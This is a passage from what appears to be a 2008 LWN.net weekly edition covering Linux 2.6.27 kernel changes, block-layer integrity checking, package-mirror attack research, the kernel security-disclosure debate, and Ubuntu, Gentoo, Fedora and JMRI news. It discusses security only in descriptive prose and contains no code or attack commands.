 The old "ppc" architecture has been removed; all platforms are now
     supported by the integrated "powerpc" architecture code.

 The SCSI command filter - which controls which SCSI commands can be 
     sent to a device by which kind of user - is now per-device and can be
     changed via sysfs.

 The block subsystem now has support for hardware which can perform
     data integrity checking; this will allow some kinds of errors to be
     caught before the associated data is lost forever.  See this article for more
     information on the block-layer integrity feature.

 The "dummy" Linux security module has been removed; the default module
     is now the capabilities module.

 The crypto code has gained support for the RIPEMD-128, RIPEMD-160,
     RIPEMD-256, and RIPEMD-320 hash algorithms.  Asynchronous hashing is
     now supported and is implemented by the "cryptd" software crypto
     daemon. 

 Xen now has support for the saving and restoring of virtual machines -
     possibly migrating them to different hosts in between.

 The new virtual file /sys/firmware/memmap shows the memory
     map as it was configured by the system BIOS before the kernel booted. 

 The ftrace lightweight tracing framework has been merged.  See
     Documentation/ftrace.txt for more
     information on ftrace. 

 The mmiotrace tool has
     been merged.  Mmiotrace will capture and print out memory-mapped I/O
     accesses, making it a useful tool for the reverse-engineering of
     binary drivers.

 The ARM and powerpc architectures now support the latencytop tool.

 The RDMA code has acquired support for the InfiniBand "base memory
     management extension" operations.  The IP-over-InfiniBand code can now
     perform large receive offload (LRO).

 Delayed allocation support has been added to the ext4 filesystem,
     which is getting quite close to its target feature set.

 The SATA layer now has enclosure management support; this allows the
     system to do things like blink an LED to indicate a specific drive in
     a large enclosure.

 The SGI IRIX binary compatibility layer has been removed.


Changes visible to kernel developers include:


 The register_security() function has been removed.  Security 
     modules which wish to implement stacking must now do so explicitly.

 The request_queue_t type is gone at last; block drivers
     should use struct request_queue instead.

 Quite a bit of big kernel
     lock removal work  has been merged.  For
     char devices, the open() method from struct
     file_operations is no longer protected by the BKL.  Calls to
     fasync() have also lost BKL protection.

 Many drivers have been converted to use the firmware loader, making it
     possible to strip the firmware from the kernel for those who are
     inclined to do so.  See this
     article for more information on the firmware work.

 The API work in the i2c layer continues; there is now an autodetection
     capability which allows new-style drivers to detect devices on their
     buses automatically.

 The SCSI layer has gained new support for "device handlers," which are
     mostly concerned with multipath management.  Some of this code has
     been moved over from the device mapper.


Come back next week for the next episode in the "what's coming in 2.6.27"
series.

		Block layer: integrity checking and lots of partitions


One likes to think of disk drives as being a reliable store of data.  As
long as nothing goes so wrong as to let the smoke out of the device, blocks
written to the disk really should come back with the same bits set in the
same places.  The reality of the situation is a bit less encouraging,
especially when one is dealing with the sort of hardware which is available
at the local computer store.  Stories of blocks which have been corrupted,
or which have been written to a location other than the one which was
intended, are common.

For this reason, there is steady interest in filesystems which use
checksums on data stored 
to block devices.  Rather than take the device's word that it successfully
stored and retrieved a block, the filesystem can compare checksums and be sure.  A
certain amount of checksumming is also done by paranoid applications in
user space.  The checksums used by BitKeeper are said to have caught a
number of corruption problems; successor tools like git have checksums
wired deeply into their data structures.  If a disk drive corrupts a git
repository, users will know about it sooner rather than later.


Checksums are a useful tool, but they have one minor problem: checksum
failures tend to come when they are too late to be useful.  By the time a
filesystem or application notices that a disk block isn't quite what it
once was, the original data may be long-gone and unrecoverable.  But disk
block corruption often happens in the process of getting the data to the
disk; it would sure be nice if the disk itself could use a checksum to
ensure that (1) the data got to the disk intact, and (2) the disk
itself hasn't mangled it.


To that end, a few standards groups have put together schemes for the
incorporation of data integrity checking into the hardware itself.  These
mechanisms generally take the form of an additional eight-byte checksum
attached to each 512-byte block.  The host system generates the checksum
when it prepares a block for writing to the drive; that checksum will
follow the data through the series of host controllers, RAID
controllers, network fabrics, etc., with the hardware verifying the
checksum along each step of the way.  The checksum is stored with the data,
and, when the data is read in the future, the checksum travels back with
it, once again being verified at each step.  The end result should be that
data corruption problems are caught immediately, and in a way which
identifies which component of the system is at fault.


Needless to say, this integrity mechanism requires operating system
support.  As of the 2.6.27 kernel, Linux will have such support, at least
for SCSI and SATA drives, thanks to Martin Petersen.  The well-written documentation file included with the data
integrity patches envisions three places where checksum generation and
verification can be performed: in the block layer, in the filesystem, and
in user space.  Truly end-to-end protection seems to need user-space
verification, but, for now, the emphasis is on doing this work in the block
layer or filesystem - though, as of this writing, no integrity-aware
filesystems exist in the mainline repository.

Drivers for block devices which can manage integrity data need to register
some information with the block layer.  This is done by filling in a
blk_integrity structure and passing it to
blk_integrity_register().  See the document for the full details;
in short, this structure contains two function pointers.
generate_fn() generates a checksum for a block of data, and
verify_fn() will verify a checksum.  There are also functions for
attaching a tag to a block - a feature supported by some drives.  The data
stored in the tag can be used by filesystem-level code to, for example,
ensure that the block is really part of the file it is supposed to belong
to.


The block layer will, in the absence of an integrity-aware filesystem,
prepare and verify checksum data itself.  To that end, the bio
structure has been extended with a new bi_integrity field,
pointing to a bio_vec structure describing the checksum
information and some additional housekeeping.  Happily, the integrity
standards were written to allow the checksum information to be stored
separately from the actual data; the alternative would have been to modify
the entire Linux memory management system to accommodate that information.
The bi_integrity area is where that information goes;
scatter/gather DMA operations are used to transfer the checksum and data
to and from the drive together.


Integrity-aware filesystems, when they exist, will be able to take over the
generation and verification of checksum data from the block layer.  A call
to bio_integrity_prep() will prepare a given bio
structure for integrity verification; it's then up to the filesystem to
generate the checksum (for writes) or check it (for reads).  There's also a
set of functions for managing the tag data; again, see the document for the
details.

Extended partitions

One of the more annoying and long-lived annoyances in the Linux block layer
has been the limit on the number of partitions which can be created on any
one device.  IDE devices can handle up to 64 partitions, which is usually
enough, but SCSI devices can only manage 16 - including one reserved for
the full device.  As these devices get larger, and as applications which
benefit from filesystem isolation (virtualization, for example) become more
popular, this limit only becomes more irksome.

The interesting thing is that the work needed to circumvent this problem
was done some years ago when device numbers were extended to 32 bits.  Some
complicated schemes were
proposed back in 2004 as a way of extending the number of partitions while
not changing any existing device numbers, but that approach was never
adopted.  In the mean time, increasing use of tools like udev has
pretty much eliminated the need for device number compatibility; on most
distributions, there are no persistent device files anymore.

So when Tejun Heo revisited the
partition limit problem, he didn't bother with obscure bit-shuffling
schemes.  Instead, with his patch set, block devices simply move to a new
major device number and have all minor numbers dynamically assigned.  That
means that no block device has a stable (across boots) number; it also
means that the minor numbers for partitions on the same device are not
necessarily grouped together.  But, since nobody really ever sees the
device numbers on a contemporary distribution, none of this should matter.

Tejun's patch series is an interesting exercise in slowly evolving an
interface toward a final goal, with a number of intermediate states.  In
the end, the API as seen by block drivers changes very little.  There is a
new flag (GENHD_FL_EXT_DEVT) which allows the disk to use extended
partition numbers; once the number of minor numbers given to
alloc_disk() is exhausted, any additional partitions will be
numbered in the extended space.  The intended use, though, would appear to
be to allocate no traditional minor numbers at all - allocating disks with
alloc_disk(0) - and creating all partitions in that extended
space.  Tejun's patch causes both the IDE and sd drivers to allocate
gendisk structures in that way, moving all disks on most systems
into the (shared) extended number space.

Even though modern distributions are comfortable with dynamic device
numbers (and names, for that matter), it seems hard to imagine that a
change like this would be entirely free of systems management problems
across the full Linux user base.  Distributors may still be a little
nervous from the grief they took after the shift to the PATA drivers
changed drive names on installed systems.  So it's not really clear when
Tejun's patches might make it into the mainline, or when distributors would
make use of that functionality.  The pressure for more partitions is
unlikely to go away, though, so these patches may find their way in before
too long.

		Ubuntu, security response, and community contributions


A recent interview with Mark
Shuttleworth is raising a few eyebrows.  The Austrian news site
derStandard sat down with Ubuntu founder and Canonical CEO Shuttleworth at
GUADEC in Istanbul asking about many aspects of Ubuntu, desktops, and Linux in
general.  His answers to questions about synchronizing releases with other
major distributions included some controversial claims.


Last May, Shuttleworth suggested that the major enterprise distributions
(Red Hat, 
SUSE, Debian, and Ubuntu) should coordinate their release cycles
to foster better stabilization of Linux components.  None of the other
distributions have expressed much in the way of interest in that plan—at
least publicly—though Shuttleworth says there have been some
interesting 
discussions behind the scenes.  In answer to a question about the belief
that Ubuntu has much more to gain than either Red Hat or Novell, 
Shuttleworth said:

Well we have a better security track record than Red Hat, we do that by
focusing very hard on security, making sure the updates are available as
fast as possible on Ubuntu, independent studies have generally ranked
Ubuntu number one.


Below is a table that summarizes the response time for a few vulnerable
packages over the last several months.  It shows when the vulnerability was
first announced along with the first update from each of four major
distributions.  Note that some distributions fixed the vulnerability at
different times for different versions, so the date below is the first;
other distribution versions may have waited longer for an update.


There doesn't appear to be any clear "winner", though Red Hat seems to beat
Ubuntu in most cases—at least on this set of vulnerabilities.  It
would be much easier to do this kind of comparison if Ubuntu followed Red
Hat's lead and published regular
assessments of its security performance.


It is rather easy to make sweeping statements, referring to unnamed
"independent studies", while it is much harder to actually gather the
information and present it.  Red Hat's transparency on its security
performance is something that all distributions should strive
for—especially those who would tout their security response.
But the security issue is just a part of a fairly pervasive perception that
Ubuntu and Canonical are not 
contributing very much back to the community.


That is the underlying concern that Shuttleworth is addressing.  He continues:

So what I'm trying to say here, that the notion that Canonical wouldn't
contribute anything in such a situation and it would be a one way flow is
something I disagree with. Look for example at the fact that Ubuntu has
usually better hardware support, if we all were on the same kernel the
others could take the drivers we put in there and have hardware support
that is just as good as Ubuntu.


While supporting more hardware is an excellent goal, doing it by merging
unsupported drivers into the kernel is not the recommended path.  As Red
Hat
kernel hacker Dave Jones puts it:

Does no-one else see the hypocrisy in this statement ? Here's how it reads
to me... "It would be great if everyone just shipped the Ubuntu kernel and
debugged the random crap we merge that we don't have the resources to do
ourselves".

If only there were some kind of process of getting drivers merged upstream
to kernel.org. Perhaps then we COULD be on the same kernel. Oh wait, there
is a process. Ubuntu just chooses to ignore it.


Canonical, unlike the other major enterprise distribution vendors, is not known for its
kernel contributions.  It is a much smaller organization than Red Hat
or Novell, so its support organization is rather small as well.  Trying to
support lots of hardware is a
difficult task.  Doing it with out-of-tree and binary-only drivers makes it
that much harder.


Historically there has also been friction
between Ubuntu and its upstream distribution, Debian, at
least partially because of a perception that it does not contribute back.
It is against this backdrop that Shuttleworth is speaking.  The fact that
he feels that he needs to defend Ubuntu speaks volumes.


Some of the complaints might be written off to jealousy over the popularity
of Ubuntu, but there is a fair amount of truth to them as well.  Canonical
and the Ubuntu community have done some fairly amazing things in a short
period of time, but they did it by leveraging lots of work by Debian and
others. It is important to be a contributing member of the larger Linux
ecosystem, so
Ubuntu and
Canonical need to work to remove this perception of the
distribution—regardless of its merits.  Talk alone won't do that,
action is required.   


		Trust and mirrors


A recent look
at attacks on package managers has much of interest.  None of the
attack methods are particularly new at some level, but applying them to the
update process is.  When the mechanism that is used to keep one's system
updated with respect to security vulnerabilities is itself susceptible, it
is definitely worth a look.


Much of the problem stems from the fact that many community distributions
rely on volunteer mirrors to distribute updates.  These mirrors could be
malicious which would allow them to distribute bad code to systems that are
checking for updates.  In addition, mirrors are perfectly placed to notice
which machines are updating for particular
vulnerabilities—information that could be used in attacks. 


The study looked at ten of the most popular Linux and BSD package
management systems 
and found all of them to be vulnerable to one or more of the flaws they
identified.  Package managers track metadata—information
about what package versions and dependencies there are—as well as
the packages themselves in formats like .rpm or .deb.
Typically, the packages are cryptographically signed (using GPG for
example) so that they can be
verified as genuine by client systems.  Some package managers also sign the
metadata, but some do not, which allows for additional attacks. 


The biggest issue with mirrors is the information that they gain.  When a
client requests a certain package, it is pretty easy to guess that it is
probably vulnerable to whatever security flaw is being fixed in that new
package.  A malicious mirror—or one that has been
subverted—could try to attack the client machine via the flaw being
fixed.  A suitable vulnerability could be used to completely
compromise the client machine.


Once a particular chunk of data, either package or metadata, has been
signed, it is valid more or less forever.  This can be used by malicious
mirrors in two ways: serving up old metadata that points clients at known
vulnerable package versions or serving up old packages that are known to
have flaws.  In both cases, it is a kind of "replay" attack, using old,
valid data for malicious purposes.


In most cases, package managers will not downgrade to previous package
versions unless explicitly instructed to, so machines that have already
upgraded are not generally vulnerable to a package replay.  However, if a
client reliably contacts a particular mirror for metadata, that mirror can
continue serving an older version until an exploit of interest comes
along.  By knowing that the client has not upgraded—because it has
been held back by the mirror-served metadata—an attacker can exploit
the newly-discovered vulnerability at their convenience.


Mirrors can also perform "endless data" attacks where the data
transfer for the package or metadata is never terminated.  The mirror keeps
sending more and more data until it fills the client disk.  This is likely
to "only" cause a denial of service on the machine that is being updated,
but that can still be a serious result, especially when the update process
is automated.


Unsigned metadata can allow for several other kinds of attacks.
Manipulating the dependencies that are provided or needed by a package can
lead to various kinds of problems.  A dependency on a non-existent package
will stop the update from happening, while a dependency on a package of the
attacker's choosing can lead to complete compromise.


There is not a lot that can be done to solve the information gathering
problem.  Subscription-based distributions generally provide their own
servers and do not rely upon mirrors to avoid this problem.  For community
distributions, there really is no central authority that has the resources
to do that.  Also, controlling all the mirrors only goes so far; if any are
compromised, the same kinds of attacks are possible.
Downloading the packages to a non-vulnerable host is probably the best
avoidance technique, but is difficult to do in practice.  


The lessons from this study are clear.  Metadata should be signed and
only downloaded from "trusted" servers.  If there is a concern about
man-in-the-middle attacks, an encrypted connection should be used between
the clients and servers with certificates being checked to ensure the
connection is going where expected.


In the end, it comes down to trusting the mirrors that one uses.  It is not
terribly surprising that mirrors can cause these kinds of problems, but the
study authors did an excellent job pulling together the different kinds of
attacks.  The picture that they paint is not particularly pretty, but it is
one we needed to see.


		Handling kernel security problems


Even the most casual observer of the linux-kernel mailing must have noticed
that, in the shadow of the firmware flame war, there is also a heated
discussion over the management of security issues.  There have also been
some attempts to turn this local battle
into a multi-list, regional conflict.  Finding the right way to deal with
security problems is difficult for any project, and the kernel is no
exception.  Whether this discussion will lead to any changes remains to be
seen, but it does at least provide a clear view of where the disagreements
are. 


Things flared up this time in response to the 2.6.25.10 stable kernel update.
The announcement stated that "any users of the 2.6.25 kernel series
are STRONGLY encouraged to upgrade to this release," but did not say
why; none of the patches found in this release were marked as security
problems.  As it happens, there were security-related fixes in that update;
some users are upset that they were not explicitly called out as such.
They have reached the point of accusing the kernel developers of hiding
security problems.


These problems, it is said, are fixed with relatively
benign-sounding commit messages ("x86_64 ptrace: fix sys32_ptrace
task_struct leak," for example) and users are not told that a security fix
has been made.  This, in turn, is thought to put users at risk because (1) they
do not know when they need to apply an update, and (2) there is no
clear picture of how many security problems are surfacing in the kernel
code.  So, as "pageexec" (or "PaX Team") put
it:


	the problem i raised was that there's one declared policy in
	Documentation/SecurityBugs (full disclosure) yet actual actions are
	completely different and now Linus even admitted it. the problem
	arising from such inconsistency is that people relying on the
	declared disclosure policy will make bad decisions and potentially
	endanger their users. there're two ways out of this sitution:
	either follow full disclosure in practice or let the world at large
	know that you (well, Linus) don't want to. in either case people
	will adjust their security bug handling processes and everyone will
	be better off.


There are two aspects to the charge that the kernel is not following a full
disclosure policy: commit messages are said to obscure security fixes, and
kernel releases do not highlight the fact that security problems have been
fixed.  There is an aspect of truth to the first charge, in that Linus will
freely admit to changing commit logs which
discuss security problems too explicitly:


	I literally draw the line at anything that is simply greppable
	for. If it's not a very public security issue already, I don't want
	a simple "git log + grep" to help find it.

	That said, I don't _plan_ messages or obfuscate them, so "overflow"
	might well be part of the message just because it simply describes
	the fix. So I'm not claiming that the messages can never help
	somebody pinpoint interesting commits to look at, I'm just also not
	at all interested in doing so reliably.


His goal here is clear: make life just a little harder for people who are
searching the commit logs for vulnerabilities to exploit.  One may argue
over whether this policy amounts to hiding security problems, or whether it
will be effective in reducing exploits (and plenty of people have shown
their willingness to do such arguing), but the fact remains that it
is the policy followed by Linus at this time.  In his view, the
committing of a fix is the disclosure of the problem, and there is no need
to be more explicit than that.

That view extends to the whole security update process found in much of the
community.  He has no respect for embargo policies or delayed disclosure, and he
criticizes the "whole security circus"
which, in his opinion, emphasizes the wrong thing:


	It makes "heroes" out of security people, as if the people who don't just 
	fix normal bugs aren't as important.

	In fact, all the boring normal bugs are _way_ more important, just
	because there's a lot more of them. I don't think some spectacular
	security hole should be glorified or cared about as being any more
	"special" than a random spectacular crash due to bad locking.


Beyond that, it is often hard to know which patches are truly security
fixes.  It has been argued at times that all bugs have security
relevance; it's mostly just a matter of figuring out how to exploit them.
So explicitly marking security fixes risks taking attention away from all
of the other fixes, many of which may also, in fact, fix security issues.
Thus, Linus says:


	If people think that they are safer for only applying (or upgrading
	to) certain patches that are marked as being security-specific,
	they are missing all the ones that weren't marked as such. Making
	them even _believe_ that the magic security marking is meaningful
	is simply a lie.  It's not going to be.

	So why would I add some marking that I most emphatically do not
	believe in myself, and think is just mostly security theater?


That said, the stable kernel updates go out with patches which are known to
be security fixes.  Some people clearly believe that being STRONGLY
encouraged to update is not sufficient notification of that fact.  It does
seem that there has been a trend away from explicit recognition of security
issues in the stable releases.  The inclusion of CVE numbers was once
common; in the 2.6.25 series, only 2.6.25.1, 2.6.25.2, and 2.6.25.5 had such numbers in the
changelogs.  It is, indeed, true that a straightforward reading of the
stable release changelogs will not tell users whether those releases fix
relevant security issues.


There are a number of answers to that complaint too, of course.  The real
information is in the source code, and that is always public.  The fixes in
the stable series are unlikely to be all that relevant to most users
anyway; they are running distributor kernels which are many months behind
even the -stable series and which may (or may not) be affected by a specific
problem.  In the end, users who are concerned about security issues in
their kernels have somebody to turn to: their distributors.  Linux
distributors follow disclosure rules and
tend to do a pretty thorough job of fixing the known security problems and
propagating those fixes to users.  For users who need a high level of
long-term support, there are distributors who are more than willing to
provide that kind of service for a fee.


As is often the case, what it really comes down to here is resources.  It
would be nice if somebody were to follow the patch stream (well over 100
patches/day into the mainline) and identify each one which has security
implications.  For each patch, this person could then figure out which
kernel version was first affected by the vulnerability, obtain a CVE
number, and issue a nicely-formatted advisory.  But this is a huge job, one
which nobody is likely to do in an uncompensated mode for any period of time.
So somebody would have to pay for this work.  And, to a great extent, that
is just what the distributors are doing now - with the nice addition that
they backport the fixes into the kernels they support.


It is worth noting that those distributors have not been doing a whole lot
of complaining about how security fixes are handled now.  Instead, the
complaining has come, primarily, from the maintainers of the out-of-tree grsecurity project which, from a
suitably 
cynical point of view, could be seen to benefit from raising the profile of
Linux kernel security problems.


But, regardless of the validity of any such charge, there may be some value
in what they are asking.  It is good to have a clear sense for what
the security problems in a piece of code are.  If nothing else, it helps
the project itself to understand where it stands with regard to security
and whether things are getting better or worse.  So it would be nice if the
kernel developers could be a bit more diligent and organized in how they
track security issues, much like the tracking of regressions has improved
over the last couple of years.  But this kind of improvement will not
happen until somebody decides to put the work into it.  Actually putting
some time into documenting kernel security issues will accomplish far more
than complaining on mailing lists.

		Control model railroads with JMRI


JMRI is the
Java Model Railroad Interface, a cross-platform open-source project
that has been developed by a long list of

contributors:


 The JMRI project is building tools for model railroad computer control. We want it to be usable to as many people as possible, so we're building it in Java to run anywhere, and we're trying to make it independent of specific hardware systems.
JMRI is intended as a jumping-off point for hobbyists who want to control their layouts from a computer without having to create an entire system from scratch.
JMRI provides the DecoderPro and

PanelPro
applications, tools for model railroaders who want to configure
DCC decoders and create control panels.

<!-- LWNPutAdHere -->

DCC, the Digital Command Control system,
uses a PC-connected
interface to send power and two-way control signals over the
model railroad track to control boards on model train
engines and other peripherals such as track switches and lights.
The protocol allows for the control of multiple engines, each engine
can have addressable lights, sound effects, smoke generators, etc.
The
JMRI Hardware Support document lists a wide
variety of supported DCC interface devices and other controller
options.  The

JMRI Help System document and

DecoderPro Manual are a good place to read about the capabilities of
the system.


Production version 2.2 of JMRI was

announced on July 15,
just in time for the 2008
National Model Railroad Convention
in Anaheim, CA:
"At long last, the 2.1.* series of JMRI test releases has resulted in something good enough for new users to start with, our definition of a "production" release. We're therefore making a new production version, JMRI 2.2, available today."
A number of

JMRI clinics are being held at the NMR convention.
The

release notes for version 2.2 mention support for many new
devices, improved support for existing devices, new scripts,
documentation improvements and more.


The JMRI project has suffered a 
legal controversy:
"For the last three years JMRI has been under attack by Matt Katzer and his attorney Kevin Russell. They have been using various coercive tactics, some of which we believe are illegal, in an attempt to put a stop to JMRI's work or to extract money from JMRI.
Katzer, through his attorney Russell, obtained a patent on model railroad technology that other people had developed years before. Using a "continuation" application, they applied for a patent that covered JMRI after JMRI had openly published its code. Because Katzer and Russell didn't provide the prior art to the Patent Office, the patent was promptly issued." (Also see this LWN article from April 2006).
Donations
are being accepted for the JMRI legal defense fund.


Despite having no compatible hardware, your author decided to
download JMRI 2.2
onto an Ubuntu Hardy Heron system with the default OpenJDK Runtime
Environment version 1.6.0-b09.  The JMRIdemo application was run
and everything started up as expected.  The demo allows the user to
step through the user interface and see the various configuration
and control screens.


To get an idea of the amount of complexity that a JMRI system
can handle, see the
SP Shasta Route
model railroad layout that is featured at
this year's NMR convention.


		Gentoo: New release, "new" leadership


Last week, lots of Gentoo news came out, so it's a good time to look at what
  happened and what it means. Gentoo's 2008.0 release marked its first
  since more than a year ago, despite its attempts to release twice a
  year. Fortunately, Gentoo releases don't mean much because it's already a
  live distribution rather than a snapshot in time with occasional updates. A
  release provides a new kernel with the accompanying driver support,
  occasionally a flashy new bootsplash, and the usual bugfixes to the GUI
  installer, which is not universally loved. But what happened to make this
  release come so long after the last one? First, 2007.1 was canceled,
  largely because so many security vulnerabilities came out that it was
  impossible to keep up with release rebuilds. 2008.0 was scheduled to come
  out in March, so it slipped 4 months.

 Tobias Klausmann described the
  problems well. Here are a couple of them:


  Building release media in itself isn't easy to begin with - catalyst is a
  powerful but complex (and complicated) tool. ... On top of this, the central
  release coordinator has to keep in mind all of the gritty details of the
  arches that will see release media. There's arches like ppc which also have
  a differently-bitted cousin (ppc64); there are arches that are very, very
  slow when building stuff (MIPS). On top of that, some software just doesn't
  build on some arches (no Java on alpha, for example) which can make deciding
  what to put on the LiveCD very hairy.
  
  People have lives. This is one that bit us this time: life struck at a very
  bad point (not that the event had been any better post-release). This
  occupied the time of a dev for a prolonged time. It made painfully obvious
  that in some spots, stand-in personnel wasn't there.


  In addition, Tobias cited three other problems:


Release work is unpopular. The release engineering team
  is perpetually undermanned, basically because the work is boring and
  otherwise unrewarding.

Bike shedding creates secrecy. Everyone's trying to
  chip in their own ideas of how things should work without having any
  experience or clue of what their ideas mean.

Reproducing installation bugs is hard. This is much
  like the Linux kernel because the release engineers just don't have the
  hardware. In some ways, it's worse, because the people who file distribution
  bugs about problems installing are often inexperienced Gentoo users who
  don't know how to file a good bug. Often, bugs that make it to the upstream
  project have already been filtered by the distribution, but that of course
  hasn't happened here.


  The main problem delaying 2008.0 was real life interfering with a critical
  developer. This is being addressed by creating new processes and backup
  people who can take over when others aren't around. As for the other
  problems, it's unclear how to fix them. Suggestions would be appreciated.


  The other major news in Gentoo is the election of a
  new council. The council is a group of 7
  people who lead Gentoo by making decisions on global issues. Two things make
  this election interesting:


It was a forced election that resulted indirectly from a
  controversy over expelling developers from the project. It happened
  because of a technicality in the Gentoo Linux
  Enhancement Proposal (GLEP) that gave the council its authority. The
  GLEP requires monthly meetings and forces an election if a majority of
  council members don't show up to a meeting. The controversy came about
  because this was an additional meeting beyond the usual one, specifically to
  discuss the appeals of 3 developers who were fired. It was poorly announced
  (only mentioned in the meeting minutes). It's unclear whether a majority of
  council members even agreed on the time.

The election involved people who think the social side of
  development matters versus people who think only
  the technical side matters. In Gentoo, the silent majority of
  developers rarely post to mailing lists, preferring to simply do
  development. Votes like this are often the only way they choose to express
  their opinions. In the past year, 50% of the
  traffic on the main development list came from 20 people, yet nearly 150
  people voted in the council election and more than 250 are listed as
  active.


 The 145 voters approach the highest number ever in a council
  election—here's how it compares with previous years:


  This is the highest turnout since the first year the council existed,
  showing a significant increase in interest by the developer community in who
  their leadership was compared to the intervening years. To understand
  exactly who they voted for, these
  histograms show how highly each candidate was ranked, in order of
  result. The left side indicates that a candidate was highly ranked, and the
  right side shows that a candidate was poorly ranked.


  Of particular interest is the position of "astinus," a developer who retired
  during the election but was still voted above three other people. Since
  these three people all favor ignorance of any social issues from someone
  with good technical contributions, this really shows how strongly the Gentoo
  development community supports the the creation of a friendlier
  environment.


  Notably, of the previous council, every single one of the five members who
  ran for the new council was re-elected. This shows that the community didn't
  care about the mistakes that resulted in the new election. It also shows
  that the community supported the existing council's actions and believed in
  what its members were saying about the need for social change within Gentoo.


  With its new release and its accompanying
  publicity, Gentoo has renewed interest from many users and has shown
  that it remains a distribution under active development. Having a new
  council in place for the next year puts Gentoo in position to rebuild its
  development community and keep development thriving so the publicity and new
  users gained by the release don't fade away.


		Fedora and distributed source packages


Fedora's new version of RPM, announced on July 9, has hit the
Rawhide repositories; after inspiring some initial cries of pain, it
would appear to 
settling in well.  It is good to see activity on Red Hat's version of RPM
after a long period where nothing much was happening.  In the process of
bringing this new code to Rawhide, the RPM developers have also inspired
some interesting side discussions on topics like whether such a major
change should have gone through the official "features" process first.  But
the most extended (and arguably most interesting) discussion came from an
unexpected direction.

Doug Ledford is known in kernel development circles, but, being an RHEL
engineer, he has not been 
seen much in the Fedora camp.  He joined the
RPM discussion with a feature request of
his own: he would like a set of tags which would facilitate the location of
a package's source code in a distributed version control system (DVCS).  So
these tags would indicate which DVCS is in use (git, mercurial, etc.),
where the repository is to be found, the tag corresponding to the source
code for a specific version of a package, etc.  And, Doug let it be known,
it would be nice if he could have those tags soon; tomorrow would be nice,
but before the Fedora 10 release in particular.

Once this information exists for a package, interesting things can be
done.  For example, source RPM packages could become much smaller; rather
than containing a tarball and a set of distributor-applied patches, it
could just hold the DVCS information.  An "installation" of that package
would then just go to the source repository and check out the sources from
there.  If the source repository is managed carefully, it could help the
cooperation between Fedora and the upstream projects; patches could be
pushed and pulled between repositories with ease.  This kind of mechanism
could also make it easier for the Fedora project to distribute "spins"
created by outsiders by reducing the resources required to make the
associated source code available.  See this
lengthy pitch from Doug for more discussion of the advantages of the
distributed source package approach.

Of course, there are some obstacles too.  Not all projects are using a
DVCS, so integration with those projects would be more difficult.  Quite a
few projects have material in their repositories which, for legal reasons,
cannot be distributed by Fedora.  Finding a way to excise that material
without breaking the connections between repositories could be
challenging.  The tarballs distributed by many upstream projects - which
are the starting place for Fedora packages now - often contain changes
which are not reflected in their source repositories.  Those changes can
include the removal of non-distributable material, or simply generating
the configure file.


These challenges are real, and some of them will take a fair amount of work
to resolve.  But it seems clear that things eventually need to go in this
direction.  Tighter integration between projects and distributors can only
help the whole free software ecosystem work in a more efficient manner.
Tarballs reflect a form of frozen state which is entirely divorced from the
code's history - and from its future.  Or, as
Doug put it:


	It's all about the repo.  A tarball is something you hand off to
	poor saps that haven't joined the 21st century, all the while
	snickering at their inability to get with the times.  It is nothing
	more than a middle man step that interferes with efficiency of
	operation and that should be cut out of the loop.


A source package format that can maintain its
connections wherever it goes can only make the whole system work better.  So it
is good that the Fedora folks (including those beyond Doug who have been
thinking about this issue for a while now) are working on this problem.


There was, however, an interesting omission from the discussion; as far as
your editor can tell, nobody ever mentioned the work being done by the vcs-pkg project, which is aimed toward this goal:


	Our goal is to integrate version control with distro package
	maintenance. We want to recognise all involved in the process, from
	upstream, the package maintainers of the various distributions,
	their security and release teams, and power users, who aren't
	afraid to fix their own bugs, and give maximum flexibility to
	them. 


This group is mostly Debian-based, but its members are making a concerted
effort to create solutions which are independent of any given distribution
(or DVCS).  It can only make sense for Fedora to work with this project -
or at least have a look at what vcs-pkg is doing and come up with a good
excuse why a different solution has to be invented for Fedora.

The integration of distributed version control and packaging can only reach
its full potential if, among other things, it facilitates cooperation
between distributors and their upstream providers, their users, and,
importantly, other distributors.  If each distributor brews up its own
solution (again), they'll have a hard time sharing their work with each
other.  Few upstream projects will have the patience to integrate with
several disparate distributor systems, so that integration will be much
less likely to happen.  All of this can be avoided, though, if the
distributors decide now to work toward some common standards for the use of
distributed version control in packaging.

		Kernel security problems: a response


I would like to try to clarify a few points in the article, "Handling
kernel security problems" by Jonathan Corbet.

First off, I speak only for myself, not for the other half of the Linux
-stable team, Chris Wright, who might totally disagree with me, nor for
the other kernel developers who help out with the security@kernel.org
alias, nor for my current employer Novell.  Also note that all of my
-stable development is done on my own time, and is not part of my role
at my current job.

All of that out of the way, I object to a few things stated in the
original article:


	It does seem that there has been a trend away from explicit
	recognition of security issues in the stable releases. The
	inclusion of CVE numbers was once common; in the 2.6.25 series,
	only 2.6.25.1, 2.6.25.2, and 2.6.25.5 had such numbers in the
	changelogs. It is, indeed, true that a straightforward reading of
	the stable release changelogs will not tell users whether those
	releases fix relevant security issues.


A number of times, when we do -stable releases, there are no CVE numbers
issued for the "security" related issues that are fixed in there.  This
happens when the fix is first made in Linus's tree, and is either
forwarded to the stable@kernel.org alias saying, "we need to get this
out now", or just by the fact that it is only later that people realize
that a CVE number should be allocated.

And yes, the trend is away from explicit recognition of security issues,
exactly following Linus's statement that you quote from.

It comes down to who are the users of the -stable kernel series.  I
personally see these kernels for two different groups of people:


 Those who want to follow the latest kernel.org releases and not rely
    on a distribution for their kernel versions.

 For distributions to base releases on, and to pick and choose
    patches from.


The first group should always update to the latest -stable kernel update
as they are relying on the -stable team to always provide them the
latest fixes that are known to be needed for them.  Simply marking
things as "security related" can be misguided as Linus points out.  The
change log entries should show all users what was fixed, and if they run
machine where this code is used, then they should upgrade.  It's as
simple as that.

In fact, in the 2.6.25.11 release I tried to say exactly that:


	It contains one bugfix, any user of the 2.6.25 kernel on x86-64
	with untrusted local users is very STRONGLY recommended to
	upgrade.


How much clearer can I be?  Does a user of the -stable tree, who has to be
technically competent to be able to do such a thing in the first place,
need to know more to decide if they need to upgrade their machines or not?
It seems people are upset that I am no longer using the magic words
"security fix", and that is true, I am not saying that anymore.  
As Linus and others have noted, marking some bugs as being
"security-related" is not helpful, especially as not everyone can even
agree - or sometimes even know at release time - whether a bug has security
implications or not.

Also note that this release does not refer to a CVE number.  This is
because, as of this moment, there still is not a number assigned,
despite asking the relevant groups for such an assignment.  I never want
to hold up a release by waiting for any such number, so I personally
will just not use them in the future in -stable releases unless they are
already contained in the original changelog entry in Linus's tree.

The second group, the distributions, all seem very happy with how the
-stable releases are conducted.  They have the capability to pick and
choose from the fixes and apply them to their older kernel versions and
ship them to their customers as they see fit.  The distros all know what
things are security related by the fact that they know and understand
the code and the threat model as they have developers assigned to
handle such security issues, and have done so for years.

In your summary, you state:


